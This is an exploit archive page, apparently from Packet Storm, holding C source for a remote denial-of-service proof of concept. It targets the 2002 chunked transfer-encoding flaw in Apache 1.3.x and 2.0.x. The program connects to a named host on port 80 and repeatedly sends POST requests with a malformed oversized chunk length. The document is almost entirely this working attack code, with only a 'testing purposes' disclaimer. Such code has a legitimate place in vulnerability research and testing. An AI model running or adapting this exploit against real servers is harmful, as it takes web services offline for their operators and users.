Apache remote DoS (1.3.x/2.0.x branches) based on the recent flaw met in chunked encoding.
cec28b70971878ff54768796e2494d2f8f48cedd275ac84b1261c0bfa5ecdbd3/*
* Apache remote DoS (1.3.x/2.0.x branches) based on the recent flaw met in chunked encoding.
* Please read http://httpd.apache.org/info/security_bulletin_20020620.txt
*
*
* Proof of concept code. For testing purposes only.
*
* By bob. [www.dtors.net]
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int main(int argc, char *argv[]) {
int sock, i;
char chunk[80];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
fprintf(stdout, "\nApache-Chunk.c By bob. [www.dtors.net]\n");
if(argc<2)
{
fprintf(stderr, "\nUsage : %s <host>\n\n", argv[0]);
exit(1);
}
fprintf(stdout, "\n---[+] Looking up host : %s.....\n", argv[1]);
if ((he=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "---[-] Hostname lookup failed!\n\n");
exit(1);
}
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
fprintf(stdout, "---[+] Connecting... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
fprintf(stderr, "---[-] Connection Timed Out!\n");
exit(1);
}
else {
sleep(5);
fprintf(stdout, "---[+] Sending... \n");
sprintf(chunk, "POST /xxx.htm HTTP/1.1\nHost: %s\nTransfer-Encoding: chunked\n\n90000000\t\t", argv[1]);
for(i = 0 ; i < 50 ; i = i + 1)
{
write(sock, chunk, 80);
write(sock, "\n\n", 2);
i = i + 1;
}
fprintf(stdout, "---[+] Sent! \n\n");
close(sock);
}
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed